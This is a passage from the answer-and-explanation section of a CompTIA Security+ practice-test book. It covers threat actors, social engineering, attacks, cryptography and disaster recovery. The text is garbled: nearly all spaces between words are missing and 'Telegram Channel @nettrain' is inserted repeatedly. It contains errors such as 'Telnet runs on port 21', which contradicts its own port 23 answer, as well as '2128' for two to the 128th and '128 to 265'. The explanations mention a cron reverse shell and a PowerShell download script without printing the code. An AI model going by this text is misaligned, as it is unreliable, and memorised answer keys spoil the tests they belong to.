isinrange.BluejackinginvolvessendingunsolicitedmessagestoBluetoothdeviceswhentheyareinrange.Eviltwinattacksusearogueaccesspointwhosenameissimilaroridenticaltothatofalegitimateaccesspoint.ARATisaremote-accessTrojan,andnothinginthisscenariopointstoaRATbeingthecauseofthestolendata.
160. B. Therulesofengagementforapenetrationtesttypicallyincludethetypeandscopeoftesting,clientcontactinformationandrequirementsforwhentheteamshouldbenotified,sensitivedatahandlingrequirements,anddetailsofregularstatusmeetingsandreports.
161. C. Thiscommandstartsareverseshellconnectingtoexample.comonport8989everyhour.Ifyou’renotfamiliarwithcron,youshouldtakeamomenttoreadthebasicsofcroncommandsandwhatyoucandowiththem—youcanreadamanpageforcronatmanpages.ubuntu.com/manpages/focal/man8/cron.8.html.
162. C. Thepenetrationtesterleveragedtheprincipleofurgencyandalsousedsomeelementsofauthoritybyclaimingtobeaseniormemberoftheorganization.Theydidn’tthreatenorintimidatethehelpdeskstaffmemberanddidnotmakesomethingseemscarce,nordidtheyattempttobuildtrustwiththestaffmember.
163. A. Proprietary,orclosedthreat,intelligenceisthreatintelligencethatisnotopenlyavailable.OSINT,oropensourcethreatintelligence,isfreelyavailable.ELINTisamilitarytermforelectronicandsignalsintelligence.Corporatethreatintelligencewasmadeupforthisquestion.
164. B. CompTIAdefines“maneuver”inthecontextofthreathuntingashowtothinklikeamalicioususertohelpyouidentifypotentialindicatorsofcompromiseinyourenvironment.OutsideoftheSecurity+exam,thisisnotacommonlyusedterminnormalsecuritypractice,althoughitdoesmakeanappearanceinmilitaryusage.SincethistermisnotcommonoutsideoftheSecurity+exam,makesureyouunderstandtheCompTIAdefinition.Intelligencefusionaddsmultipleintelligencesourcestogether,threatfeedsareusedtoprovideinformationaboutthreats,andadvisoriesandbulletinsareoftencombinedwiththreatfeedstounderstandnewattacks,vulnerabilities,andotherthreatinformation.
165. B. Scriptkiddiesaretheleastresourcedofthecommonthreatactorslistedabove.Ingeneral,theyflowfromnationalstateactorsasthemosthighlyresourced,toorganizedcrime,tohacktivists,toinsideactors,andthento
Telegram Channel @nettrain
scriptkiddiesastheleastcapableandleastresourcedactors.Aswithanyscalelikethis,thereisroomforsomevariabilitybetweenspecificactors,butfortheexam,youshouldtracktheminthatorder.
166. B. ASYNfloodisatypeofresourceexhaustionattackandusesupallavailablesessionsonthesystemitisaimedat.AlthoughaSYNfloodcanbeaDDoS,nomentionwasmadeofmultiplesourcemachinesfortheattack.Noapplicationwasmentioned,andaSYNfloodtargetstheTCP/IPstackonthesystemratherthananapplication.Novulnerabilitywasmentioned,andnoneisrequiredforaSYNflood,sinceitsimplytriestooverwhelmthetarget’sabilitytohandletheopenedconnections.ProtectionsagainstSYNfloodstendtofocusonpreventingopenedconnectionsfromcausingresourceexhaustionandidentifyingandblockingabusivehosts.
167. A. Pretextingisatypeofsocialengineeringthatinvolvesusingafalsemotiveandlyingtoobtaininformation.Here,thepenetrationtesterliedabouttheirroleandwhytheyarecalling(impersonation),andthenbuiltsometrustwiththeuserbeforeaskingforpersonalinformation.Awateringholeattackleveragesawebsitethatthetargetedusersalluseandplacesmalwareonittoachievetheirpurpose.PrependingisdescribedbyCompTIAas“addinganexpressionoraphrase,”andshouldersurfinginvolveslookingoveranindividual’sshoulderorotherwiseobservingthementeringsensitiveinformationlikepasswords.
168. C. Youmaybefamiliarwiththetermwardriving,butwarflyingisincreasinglycommonasdroneshaveenteredwideuse.Althoughpenetrationtestersaresomewhatunlikelytoflyahelicopterorairplaneoveratargetsite,inexpensivedronescanprovideusefulinsightintobothphysicalsecurityandwirelessnetworkcoverageifequippedwiththerighthardware.Droningandaerialsnoopingweremadeupforthisquestion,andAirSnarfisanoldtoolforcapturingusernamesandpasswordsonvulnerablewirelessnetworks.
169. C. Manyorganizationshavelegacyplatformsinplacethatcannotbepatchedorupgradedbutthatarestillanimportantpartoftheirbusiness.Securityprofessionalsareoftenaskedtosuggestwaystosecurethesystemswhileleavingthemoperational.CommonoptionsincludemovingthedevicestoanisolatedvirtualLAN(VLAN),disconnectingthedevicesfromthenetworkandensuringtheyarenotpluggedbackin,andusingafirewallorothersecuritydevicetoensurethatthelegacysystemisprotectedfrom
Telegram Channel @nettrain
attacksandcannotbrowsetheInternetorperformotheractionsthatcouldresultincompromise.
170. B. AccordingtothenationalcouncilofISACs,informationsharingandanalysiscenters,“InformationSharingandAnalysisCenters(ISACs)helpcriticalinfrastructureownersandoperatorsprotecttheirfacilities,personnelandcustomersfromcyberandphysicalsecuritythreatsandotherhazards.ISACscollect,analyzeanddisseminateactionablethreatinformationtotheirmembersandprovidememberswithtoolstomitigaterisksandenhanceresiliency.”IRTsareincidentresponseteams,FeedburnerisGoogle’sRSSfeedmanagementtool,andverticalthreatfeedsisnotanindustryterm.
171. B. TCPport23istypicallyassociatedwithTelnet,anunencryptedremoteshellprotocol.SinceTelnetsendsitsauthenticationandothertrafficintheclear(clear/plaintext),itshouldnotbeused,andLuccashouldidentifythisasaconfigurationissueinvolvinganinsecureprotocol.
172. B. Privilegeescalationattacksfocusongainingadditionalprivileges.Inthiscase,Cameronusedphysicalaccesstothesystemtomodifyit,allowinghimtothenconductaprivilegeescalationattackasanunprivilegeduser.ATrojanwouldhaverequiredafiletoactlikeitwasdesirable,adenial-of-serviceattackwouldhavepreventedaccesstoasystemorservice,andswapfiles(orpagefiles)aredrivespaceusedtocontainthecontentsofmemorywhenmemoryrunslow.Swapfilesmaycontainsensitivedata,butthetermswapfileattackisnotcommonlyused.
173. C. CommonattributesofthreatactorsthatyoushouldbeabletodescribeandexplainfortheSecurity+examincludewhethertheyareinternalorexternalthreats,theirlevelofsophisticationorcapability,theirresourcesorfunding,andtheirintentormotivation.Thenumberofyearsofexperienceisdifficulttodetermineformanythreatactorsandisnotadirectwaytogaugetheircapabilities,andisthereforenotacommonattributethatisusedtoassessthem.
174. B. Althoughengagingdomainexpertsisoftenencouraged,requiringthird-partyreviewofproprietaryalgorithmsisnot.Manymachinelearningalgorithmsaresensitivesincetheyarepartofanorganization’scompetitiveadvantage.Ensuringthatdataissecureandofsufficientquality,ensuringasecuredevelopmentenvironment,andrequiringchangecontrolareallcommonartificialintelligence(AI)/machinelearning(ML)security
Telegram Channel @nettrain
practices.
175. A. Whiteteamsactasjudgesandprovideoversightofcybersecurityexercisesandcompetitions.OptionsBandCmayremindyouofwhite-andgray-boxtests,butthey’reonlytheretoconfuseyou.Cybersecurityteamsareusuallyreferredtowithcolorslikered,blue,andpurpleasthemostcommoncolors,aswellasthewhiteteamsthattheSecurity+examoutlinementions.Defendersinanexercisearepartoftheblueteam.
176. C. Bugbountiesareincreasinglycommonandcanbequitelucrative.Bugbountywebsitesmatchvulnerabilityresearcherswithorganizationsthatarewillingtopayforinformationaboutissueswiththeirsoftwareorservices.Ransomsaresometimesdemandedbyattackers,butthisisnotaransomsinceitwasvoluntarilypaidaspartofarewardsystem.Azero-daydisclosurehappenswhenavulnerabilityisdisclosedandtheorganizationhasnotbeenpreviouslyinformedandallowedtofixtheissue.Finally,youmightfeellike$10,000isapayday,butthetermisnotusedasatechnicaltermanddoesn’tappearontheexam.
177. A. Linuxprivilegescanbesetnumerically,and777setsuser,group,andworldtoallhaveread,write,andexecuteaccesstotheentire/etcdirectory.Settingpermissionslikethisisacommonworkaroundwhenpermissionsaren’tworkingbutcanexposedataormakebinariesexecutablebyuserswhoshouldnothaveaccesstothem.Whenyousetpermissionsforasystem,remembertosetthemaccordingtotheruleofleastprivilege:onlythepermissionsthatarerequiredfortheroleortaskshouldbeconfigured.
178. B. Footprintingistheprocessofgatheringinformationaboutacomputersystemornetwork,anditcaninvolvebothactiveandpassivetechniques.Mapping,fingerprinting,andaggregationarenotthecorrectorcommontermsforthispractice.
179. C. Whendial-upmodemswereinheavyuse,hackerswouldconductwardialingexercisestocallmanyphonenumberstofindmodemsthatwouldanswer.Whenwirelessnetworksbecamethenorm,thesametypeoflanguagewasused,leadingtotermslikewarwalking,wardriving,andevenwarflying.Therestoftheoptionsweremadeup,butyoushouldrememberthattheSecurity+examexpectsyoutoknowaboutwardrivingandwarflying.
180. B. Lightingandutilitysystems,aswellasSCADA,PLCs,CNC,scientificequipmentandsimilardevicesaretypesofoperationaltechnology.Since
Telegram Channel @nettrain
thisisadistributedattackthatresultsinadenialofservice,itisadistributeddenial-of-service(DDoS)attack.OTsystemsareoftenisolatedorotherwiseprotectedfromremotenetworkconnectionstopreventthistypeofattacksincemanyOTdevicesdonothavestrongsecuritycontrolsorfrequentupdates.ASCADAoverflowisnotatermusedintheindustry,butnetworkandapplicationDDoSattacksdoappearontheSecurity+examoutline,andyouwillneedtobeabletodifferentiatethemfromthistypeofOTDDoS.
181. C. Afalsenegativeoccurswithavulnerabilityscanningsystemwhenascanisrunandanissuethatexistsisnotidentified.Thiscanbebecauseofaconfigurationoption,afirewall,orothersecuritysettingorbecausethevulnerabilityscannerisotherwiseunabletodetecttheissue.Amissingvulnerabilityupdatemightbeaconcerniftheproblemdidnotspecificallystatethatthedefinitionsarefullyup-to-date.Unlessthevulnerabilityissonewthatthereisnodefinition,amissingupdateshouldn’tbetheissue.Silentpatchingreferstoapatchingtechniquethatdoesnotshowmessagestousersthatapatchisoccurring.Afalsepositivewouldhavecausedavulnerabilitytoshowthatwasnotactuallythere.Thissometimeshappenswhenapatchorfixisinstalledbuttheapplicationdoesnotchangeinawaythatshowsthechange.
182. A. Refactoringaprogrambyautomatedmeanscanincludeaddingadditionaltext,comments,ornonfunctionaloperationstomaketheprogramhaveadifferentsignaturewithoutchangingsitsoperations.Thisistypicallynotamanualoperationduetothefactthatantimalwaretoolscanquicklyfindnewversions.Instead,refactoringisdoneviaapolymorphicorcodemutationtechniquethatchangesthemalwareeverytimeitisinstalledtohelpavoidsignature-basedsystems.
183. B. Hybridwarfareisarelativelynewtermthatdescribesthemultiprongedattacksconductedaspartofamilitaryornationalstrategyofpoliticalwarfarethatusestraditional,asymmetric,andcyberwarfaretechniquesalongwithinfluencemethodstoachievegoals.
184. C. Thisisanexampleofahoax.Hoaxesarefakesecuritythreatsandcanconsumebothtimeandresourcestocombat.Userawarenessandgoodhabitsforvalidatingpotentialhoaxesarebothusefulwaystopreventthemfromconsumingmoretimeandenergythantheyshould.Aphishingattemptwouldtargetcredentialsorotherinformation,noidentityinformationismentionedforidentityfraudhere,andaninvoicescam
Telegram Channel @nettrain
involvesafakeormodifiedinvoice.
185. B. ThisisanattempttogettheservertosendarequesttoitselfaspartofanAPIcall,anditisanexampleofserver-siderequestforgery.Across-sitescriptingattackwouldusethevictim’sbrowserratherthanaserver-siderequest,aswouldaCSRFattack.
186. B. Threathuntingcaninvolveavarietyofactivitiessuchasintelligencefusion,combiningmultipledatasourcesandthreatfeeds,andreviewingadvisoriesandbulletinstoremainawareofthethreatenvironmentforyourorganizationorindustry.
187. C. Passwordsinmemoryareoftenstoredinplaintextforuse.Thismeansthatattackerscanrecoverthemiftheycanaccessthememorywherethepasswordisstored,evenifthestorageisephemeral.
188. D. TheAISserviceusesSTIXandTAXII.STIXandTAXIIareopenstandardsthattheDepartmentofHomelandSecuritystartedthedevelopmentofandusesforthistypeofeffort.YoucanreadmoreaboutAIShere:www.us-cert.gov/ais.
189. C. Thereconnaissancephaseofapenetrationtestinvolvesgatheringinformationaboutthetarget,includingdomaininformation,systeminformation,anddetailsaboutemployeeslikephonenumbers,names,andemailaddresses.
190. A. Angelahasimpersonatedanactualemployeeofthedeliveryservicetogainaccesstothecompany.Companyuniformsareaveryusefulelementforin-personsocialengineering.Whalingisatypeofphishingattackaimedatleadersinanorganization.Awateringholeattackdeploysmalwareorotherattacktoolsatasiteorsitesthatatargetgroupfrequentlyuses.PrependingisvaguelydefinedbytheSecurity+exambutcanmeananumberofthings.Whenyouseeprependingontheexam,itshouldnormallymean“addingsomethingtothefrontoftext.”
191. D. Acquisitionviathegraymarketcanleadtolackofvendorsupport,lackofwarrantycoverage,andtheinabilitytovalidatewherethedevicescamefrom.Nickshouldexpressconcernsaboutthesupplychain,andifhisdevicesneedtobefromatrustedsourceorsupplierwithrealsupporthemayneedtochangehisorganization’sacquisitionpractices.
192. B. XMLinjectionisoftendonebymodifyingHTTPqueriessenttoanXML-basedwebservice.Reviewingwebserverlogstoseewhatwassent
Telegram Channel @nettrain
andanalyzingthemforpotentialattackswillhelpChristinaseeifunexpecteduserinputisvisibleinthelogs.Syslog,authenticationlogs,andeventlogsareunlikelytocontaininformationaboutwebapplicationsthatwouldshowevidenceofanXMLinjection–basedattack.
Usethefollowingscenarioforquestions193–195.
FrankistheprimaryITstaffmemberforasmallcompanyandhasmigratedhiscompany’sinfrastructurefromanon-sitedatacentertoacloud-basedinfrastructureasaservice(IaaS)provider.Recentlyhehasbeenreceivingreportsthathiswebsiteisslowtorespondandthatitisinaccessibleattimes.Frankbelievesthatattackersmaybeconductingadenial-of-serviceattackagainsthisorganization.
193. C. Frank’sbestoptionistoreviewtheanti-denial-of-serviceandothersecuritytoolsthathiscloudhostingproviderprovides,andtomakeappropriateuseofthem.Themajorinfrastructureasaservice(IaaS)providershaveavarietyofsecuritytoolsthatcanhelpbothdetectandpreventDoSattacksfromtakingdownsitesthatarehostedintheirinfrastructure.Callingthecloudserviceprovider’sISPwillnotworkbecausetheISPworkswiththecloudprovider,notwithFrank!ItispossiblethecloudserviceprovidermightbeabletoassistFrank,buttheyaremostlikelytoinstructhimtousetheexistingtoolsthattheyalreadyprovide.
194. C. SinceFrankisusingthecloudserviceprovider’swebservices,hewillneedtoreviewthelogsthattheycapture.Ifhehasnotconfiguredthem,hewillneedtodoso,andhewillthenneedaserviceorcapabilitytoanalyzethemforthetypesoftrafficheisconcernedabout.SyslogandApachelogsarebothfoundonatraditionalwebhost,andtheywouldbeappropriateifFrankwasrunninghisownwebserversintheinfrastructureasaservice(IaaS)environment.
195. B. ThemostusefuldataislikelytocomefromanIPS,orintrusionpreventionsystem.Hewillbeabletodetermineiftheattackisadenial-of-service(DoS)attack,andtheIPSmaybeabletohelphimdeterminethesourceofthedenial-of-serviceattack.Afirewallmightprovidesomeusefulinformationbutwouldonlyshowwhetherornottrafficwasallowedandwouldnotanalyzethetrafficforattackinformation.Avulnerabilityscannerwouldindicateiftherewasanissuewithhisapplicationortheserver,butitwouldnotidentifythistypeofattack.Antimalwaresoftwarecanhelpfind
Telegram Channel @nettrain
malwareonthesystembutisn’teffectiveagainstaDoSattack.
196. D. Contractualterms,auditing,andsecurityreviewsareallcommonmeansofreducingthird-partyriskswhenworkingwithavendorthatisperformingsystemsintegrationwork.AnSOC(serviceorganizationcontrols)reportwouldtypicallyberequestedifyouweregoingtouseathird-partyvendor’sdatacenterorhostedservices.
197. B. Traininganartificialintelligence(AI)ormachinelearning(ML)systemwithtainteddataisasignificantconcern.EliasneedstoensurethatthetrafficonhisnetworkistypicalandnonmalicioustoensurethattheAIdoesnotpresumethatmalicioustrafficisnormalforhisnetwork.
198. C. Themostcommonmotivationforhacktivistsistomakeapoliticalstatement.Reputationalgainsareoftenassociatedwithscriptkiddies,whereasfinancialgainismostcommonlyagoaloforganizedcrimeorinsiderthreats.Gatheringhigh-valuedataistypicalofbothnation-stateactorsandorganizedcrime.
199. D. Predictiveanalysistoolsuselargevolumesofdata,includinginformationaboutsecuritytrendsandthreats,largesecuritydatasetsfromvarioussecuritytoolsandothersources,andbehaviorpatterns,topredictandidentifymaliciousandsuspiciousbehavior.
200. C. IdentityfraudandidentitytheftcommonlyuseSocialSecuritynumbersaspartofthetheftofidentity.Tailgatinginvolvesfollowingapersonthroughasecuritydoororgatesothatyoudonothavetopresentcredentialsoracode,whereasimpersonationisasocialengineeringtechniquewhereyouclaimtobesomeoneelse.Blackmailisapotentialanswer,butthemostcommonusageisforidentityfraud.
201. A. SOARtools,likesecurityinformationandeventmanagement(SIEM)tools,arehighlyfocusedonsecurityoperations.Theyincludethreatandvulnerabilitymanagement,securityincidentresponse,andsecurityoperationsandautomationtools,buttheydonotprovidesourcecodeanalysisandtestingtools.
202. B. TheSecurity+examoutlinespecificallyliststheseitemsasthreatvectors.Althoughtherearemanyothers,youshouldbefamiliarwithdirectaccess,wireless,email,supplychain,socialmedia,removablemedia,andcloudasvectorsfortheexam.
203. C. Althoughitmayseemstrangeatfirst,bothSourceForgeandGitHub
Telegram Channel @nettrain
areusedtohousesampleexploitcodeaswellasotherinformationthatthreatintelligenceanalystsmayfinduseful.Theyarenotpartofthedarkweb,noraretheyanautomatedindicatorsharing(AIS)sourceorapublicinformationsharingcenter.
204. B. Trustingratherthanvalidatinguserinputistherootcauseofimproperinputhandling.Allinputshouldbeconsideredpotentiallymaliciousandthustreatedasuntrusted.Appropriatefiltering,validation,andtestingshouldbeperformedtoensurethatonlyvaliddatainputisacceptedandprocessed.
205. C. ThecodeisanexampleofaPowerShellscriptthatdownloadsafileintomemory.Youcanruleouttheuploadoptionsbyreadingthescriptsinceitmentionsadownloadinthescriptexample.Sinceweseeastringbeingdownloaded,ratherthanafileandlocation,youmaybeabletoguessthatthisisafilelessmalwareexample.
206. C. SessionIDsshouldbeuniquefordistinctusersandsystems.AverybasictypeofsessionreplayattackinvolvesprovidingavictimwithasessionIDandthenusingthatsessionIDoncetheyhaveusedthelinkandauthenticatedthemselves.Protectionssuchassessiontimeoutsandencryptingsessiondata,aswellasencodingthesourceIP,hostname,orotheridentifyinginformationinthesessionkey,canallhelppreventsessionreplayattacks.
207. B. TheSecurity+examoutlinelistssevenmajorimpactcategories,includingdataloss,databreaches,anddataexfiltration.Datamodificationisnotlisted,butitisaconcernaspartoftheintegritylegoftheCIAtriad.
208. C. Academicjournalsaretheslowestoftheitemslistedbecauseofthereviewprocessesinvolvedwithmostreputablejournals.Althoughacademicjournalscanbeusefulresources,theyaretypicallynotup-to-the-minutesources.Otherresourcesyoushouldbeawareofarevendorwebsites,conferences,socialmedia,andRFCs(requestsforcomments).
209. C. Vulnerabilityscansandportscanscanoftenbedetectedinlogsbylookingforaseriesofportsbeingconnectedto.Inthiscase,thelogwascreatedbyscanningasystemwithanOpenVASscanner.Thereisnoindicationofasuccessfulloginorotherhackingattempt,andaservicestartupwouldshowinthemessageslog,nottheauthlog.Arebootwouldalsoshowinthemessageslogratherthantheauthlog.
210. C. Althoughitmaybetemptingtoimmediatelyupgrade,readingand
Telegram Channel @nettrain
understandingtheCVEsforavulnerabilityisagoodbestpractice.OnceCharlesunderstandstheissue,hecanthenremediateitbasedontherecommendationsforthatspecificproblem.DisablingPHPorthewebserverwouldbreaktheservice,andinthiscase,onlynewerversionsofPHPthan5.4havethepatchCharlesneeds.
211. D. Although80and443arethemostcommonHTTPports,itiscommonpracticetorunadditionalwebserversonport8080whenanonstandardportisneeded.SSHwouldbeexpectedtobeonport22,RDPon3389,andMySQLon3306.
212. B. Oncethisissueisremediated,Rickshouldinvestigatewhythesystemwasrunningaplug-infrom2007.Inmanycases,whenyoudiscoveravulnerablecomponentlikethisitindicatesadeeperissuethatexistsintheorganizationorprocessesforsystemandapplicationmaintenance.Installingawebapplicationfirewall(WAF)orreviewingintrusionpreventionsystem(IPS)logsmaybeusefulifRickthinksthereareongoingattacksorthatsuccessfulattackshaveoccurred,buttheproblemdoesnotstateanythingaboutthat.Thereisnoindicationofcompromise,merelyacompletelyoutdatedplug-inversionintheproblem.Ifyouwantasamplesystemwithvulnerableplug-inslikethistotest,youcandownloadthe2015releaseoftheOpenWebApplicationSecurityProject(OWASP)brokenwebapplicationsvirtualmachine.Ithasawiderangeofcompletelyout-of-dateapplicationsandservicestopracticeagainst.
213. C. AnetworkdevicerunningSSHandawebserveronTCPport443isaverytypicaldiscoverywhenrunningavulnerabilityscan.Withoutanydemonstratedissues,Carolynshouldsimplynotethatshesawthoseservices.Telnetrunsonport21,anunencryptedwebserverwillrunonTCP80inmostcases,andWindowsfilesharesuseavarietyofportsincludingTCPports135–139and445.
214. B. Configurationreviews,eitherusingautomatedtoolormanualvalidation,canbeausefulproactivewaytoensurethatunnecessaryportsandservicesarenotaccessible.Configurationmanagementtoolscanalsohelpensurethatexpectedconfigurationsareinplace.Neitherpassivenoractivenetworkpacketcapturewillshowservicesthatarenotaccessed,meaningthatopenportscouldbemissed,andlogreviewwon’tshowallopenportseither.
215. C. Errorsareconsideredavulnerabilitybecausetheyoftenprovide
Telegram Channel @nettrain
additionaldetailsaboutthesystemoritsconfiguration.Theytypicallycannotbeusedtodirectlyexploitorcrashthesystem.
216. D. Thisappearstobeasituationwhereyournetwork’sDNSserveriscompromisedandsendingpeopletoafakesite.ATrojanhorseismalwaretiedtoalegitimateprogram.IPspoofingwouldbeusingafakeIPaddress,butthatisnotdescribedinthisscenario.Infact,theusersarenoteventypinginIPaddresses—theyaretypinginURLs.Clickjackinginvolvestrickingusersintoclickingsomethingotherthanwhattheyintended.
217. C. Thisisaclassicexampleoftyposquatting.Thewebsiteisoffbyonlyoneortwoletters;theattackerhopesthatusersoftherealwebsitemistypetheURLandaretakentotheirfakewebsite.Sessionhijackingistakingoveranauthenticatedsession.Cross-siterequestforgerysendsfakerequeststoawebsitethatpurporttobefromatrusted,authenticateduser.Clickjackingattemptstotrickusersintoclickingonsomethingotherthanwhattheyintended.
Telegram Channel @nettrain
Chapter2:ArchitectureandDesign1. C. Thediagramshowsservicesandports,butitdoesnotlisttheprotocol.
BenshouldaskiftheseareTCP-orUDP-basedservices,sinceanincorrectguesswouldresultinanonfunctionalservice,andopeningupunnecessaryprotocolsmayinadvertentlycreateexposuresorrisks.Thesubnetmaskisshownwheremultiplesystemsinanetworkontheclientsiderequireit,theservicenameisn’tnecessaryforafirewallrule,andAPIkeysshouldnotbestoredindocumentslikethis.
2. A. ThecorrectansweristheOpenWebApplicationSecurityProject(OWASP).Itisthedefactostandardforwebapplicationsecurity.
TheNorthAmericanElectricReliabilityCorporation(NERC)isconcernedwithelectricalpowerplantsecurity,TrustedFoundryisatermusedtodescribeasecuresupplychainforcomputerICs,andISA/IECstandardsareforsecuringindustrialautomationandcontrolsystems(IACSs).
3. B. Vendordiversitygivestwosecuritybenefits.Thefirstisthatthereisnosinglepointoffailureshouldonevendorceaseoperations.Thesecondbenefitisthateachvendorhasaspecificmethodologyandalgorithmsusedfordetectingmalware.Ifyouusethesamevendoratallpointswhereyouneedmalwaredetection,anyflaworweaknessinthatvendor’smethodologywillpersistacrossthenetwork.Usingasinglevendormeansthatanyweaknessinthatvendor’smethodologyortechnologycouldimpacttheentiresystemornetwork.Vendorforkingisnotatermintheindustry,andthisisnotaneutralact;vendordiversityimprovessecurity.
4. B. Inthisscenario,thebestfittoScott’sneedsisasecondnetworkattachedstorage(NAS)devicewithafullcopyoftheprimaryNAS.Inafailurescenario,thesecondaryNAScansimplytaketheplaceoftheprimaryNASwhileindividualdisksoreventhewholeNASisreplaced.Tape-basedbackupstakelongertorestore,regardlessofwhethertheyarefullorincrementalbackups,althoughincrementalbackupscantakemoretimeinsomecasessinceswappingtapesinordercanaddtimetotherestorationprocess.Finally,acloud-basedbackupsystemwouldbeusefulifScottwasworriedaboutalocaldisasterbutwouldbeslowerthanalocalidenticalNAS,thusnotmeetingScott’sprimaryrequirement.
5. C. Restorationordercanbeveryimportantinacomplexenvironmentdue
Telegram Channel @nettrain
tosystemdependencies.Restorationordercanalsoensurethatthepropersecuritycontrolsareinplacebeforesystemsareonline.Adatacentershouldbeabletohandlesystemscomingonlinewithoutfailingifitspowersystemsareproperlydesigned.AsecondoutageduetofailedsystemswouldmeanthatYasminehasnotdeterminedwhytheoutagehasoccurred,makingrestorationpotentiallydangerousorproblematic.Finally,firesuppressionsystemsshouldonlyactivateforanactualfireorwhenfireprecursorslikesmokearedetected,notforincreasedheatload.
6. B. Airgappingreferstotheservernotbeingonanetwork.Thismeansliterallythatthereis“air”betweentheserverandthenetwork.Thispreventsmalwarefrominfectingthebackupserver.AseparateVLANorphysicalnetworksegmentcanenhancesecuritybutisnotaseffectiveasairgapping.Ahoneynetisusedtodetectattacksagainstanetwork,butitdoesn’tprovideeffectivedefenseagainstmalwareinthisscenario.
7. C. Windowspicturepasswordsrequireyoutoclickonspecificlocationsonapicture.Thisisanexampleofasomething-you-can-dofactor.Geolocationoranetworklocationareexamplesofsomewhereyouare,whereassomethingyouexhibitisoftenapersonalitytrait,andsomeoneyouknowisexactlywhatitsoundslike:someonewhocanidentifyyouasanindividual.
8. C. Hashfunctionsconvertvariable-lengthinputsintofixed-lengthoutputswhileminimizingthechangesofmultipleinputs,resultinginthesameoutput(collisions).Theyalsoneedtobefasttocompute.Hashesshouldnotbereversible;theyareaone-wayfunction!
9. B. Themostcommonwaytoensurethatthird-partysecuredestructioncompaniesperformtheirtasksproperlyistosignacontractwithappropriatelanguageandmakesurethattheycertifythedestructionofthematerialstheyareaskedtodestroy.Manualon-siteinspectionbythirdpartiesissometimesdoneaspartofcertification,butfederalcertificationisnotacommonprocess.Requiringpicturesofeverydestroyeddocumentwouldcreateanewcopy,thusmakingitaflawedprocess.
10. A. Usingbothserver-sideexecutionandvalidationrequiresmoreresourcesbutpreventsclient-sidetamperingwiththeapplicationanddata.ForOlivia’sdescribedneeds,server-sideexecutionandvalidationisthebestoption.
11. D. AnArduinoisamicrocontrollerwellsuitedforcustomdevelopmentof
Telegram Channel @nettrain
embeddedsystems.Theyaresmall,inexpensive,andcommonlyavailable.UnlikeaRaspberryPi,theyarenotasmallcomputer,reducingtheiroverallriskofcompromise.Acustomfield-programmablegatearray(FPGA)willtypicallybemorecomplexandexpensivethananArduino,whereasarepurposeddesktopPCintroducesallthepotentialissuesthataPCcanincludesuchasavulnerableoperatingsystemorsoftware.
12. D. Digitalsignaturesarecreatedusingthesigner’sprivatekey,allowingittobevalidatedusingtheirpublickey.
13. C. Addingonebittoakeydoublestheworkrequired.Theoriginaleffortwouldhave2128potentialsolutions,whereastheincreasedkeylengthwouldrequire2129.Inreallife,keylengthsaren’tincreasedby1;instead,theyaretypicallyincreasedbyfactorsof2,suchas128to265,or1024to2048.
14. C. Keystretchingisusedtoimproveweakkeys.Onewayofimplementingitisbyrepeatedlyusingahashfunctionorablockcipher,increasingtheeffortthatanattackerwouldneedtoexerttoattacktheresultinghashedorencrypteddata.Therestoftheoptionsweremadeup.
15. A. Asaltisavalueaddedtoastringbeforeitishashed.Thesaltisstoredsothatitcanbeaddedtopasswordswhentheyareusedinthefuturetocomparetothehash.Sinceeachsaltisunique,thismeansthatanattackerwouldneedtogenerateauniquerainbowtableforeverysalttobeabletoattackthestoredhasheseffectively.Forhigh-valuepasswords,thismaybeworthwhile,butforbulklistsofpasswords,itisnotareasonableattackmethod.
16. C. IanwilluseMichelle’spublickeytoencryptthemessagesothatonlyshecanreaditusingherprivatekey.Ifhewantedtosignthemessage,hecouldusehisprivatekey,andMichellecouldusehispublickeytovalidatehissignature.NeitherIannorMichelleshouldeverrevealtheirprivatekeys.
17. A. Ellipticalcurvecryptography(ECC)isfasterbecauseitcanuseasmallerkeylengthtoachievelevelsofsecuritysimilartoalongerRSAkey(a228-bitellipticalcurvekeyisroughlyequivalenttoa2,380-bitRSAkey).Usingthesamekeytoencryptanddecryptwouldbetrueforasymmetricencryptioncryptosystem;however,neitherofthesearesymmetric.Eitheralgorithmcanrunonolderprocessorsgiventherightcryptographiclibrariesorprogramming,althoughbothwillbeslower.Both
Telegram Channel @nettrain
canbeusedfordigitalsignatures.
18. A. Perfectforwardsecrecy(PFS)isusedtochangekeysusedtoencryptanddecryptdata,ensuringthatevenifacompromiseoccurs,onlyaverysmallamountofdatawillbeexposed.Symmetricencryptionusesasinglekey.QuantumkeyrotationandDiffie-Hellmankeymodulationarebothtermsmadeupforthisquestion.
19. A. Checkingavisitor’sIDagainsttheirlogbookentrycanensurethattheinformationtheyhaverecordediscorrectandthattheperson’sIDmatcheswhotheyclaimtobe.Biometricscansonlyworkonenrolledindividuals,meaningthatmanyguestsmaynothavebiometricdataenrolled.Two-personintegritycontrolwouldonlybeusefuliftherewasaconcernthataguardwasallowingunauthorizedindividualsintothefacility.Asecurityrobottypicallycannotvalidateavisitor’sidentityfromanIDandlogentry.Thismaychangeastheybecomemoreadvanced!
20. D. Honeypotsaredesignedtoattractahackerbyappearingtobesecurityholesthatareripeandreadyforexploitation.Ahoneynetisanetworkhoneypot.Thissecuritytechniqueisusedtoobservehackersinactionwhilenotexposingvitalnetworkresources.Anintrusiondetectionsystem(IDS)isusedtodetectactivitythatcouldindicateanintrusionorattack.Neitheractivedetectionnorfalsesubnetisacommonindustryterm.
21. C. SCADA,orSupervisoryControlandDataAcquisitionsystems,arecommonlyusedtomanagefacilitieslikepowerplants.Therestoftheoptionsweremadeup.
22. D. Primefactorizationalgorithmsandellipticcurvecryptographyarebelievedtobevulnerabletofuturequantumcomputing–drivenattacksagainstcryptographicsystems.Althoughthisislargelytheoreticalatthemoment,quantumencryptionmaybetheonlyreasonableresponsetoquantumattacksagainstcurrentcryptographicalgorithmsandsystems.
23. C. Geoffislookingforawarmsite,whichhassomeoralloftheinfrastructureandsystemsheneedsbutdoesnothavedata.Ifadisasteroccurs,Geoffcanbringanyequipmentthatheneedsorwantstothesitealongwithhisorganization’sdatatoresumeoperations.Ahotsiteisafullyfunctionalenvironmentwithallthehardware,software,anddataneededtooperateanorganization.Theyareexpensivetomaintainandrunbutareusedbyorganizationsthatcannottaketheriskofdowntime.Acoldsiteisalocationthatcanbebroughtonlinebutdoesnothavesystems;coldsites
Telegram Channel @nettrain
typicallyhaveaccesstopowerandbandwidthbutneedtobefullyequippedtooperateafteradisastersincetheyarejustrentedspace.AnRTOisarecoverytimeobjective,anditmeasureshowlongitshouldtaketoresumeoperations;itisnotatypeofdisasterrecoverysite.
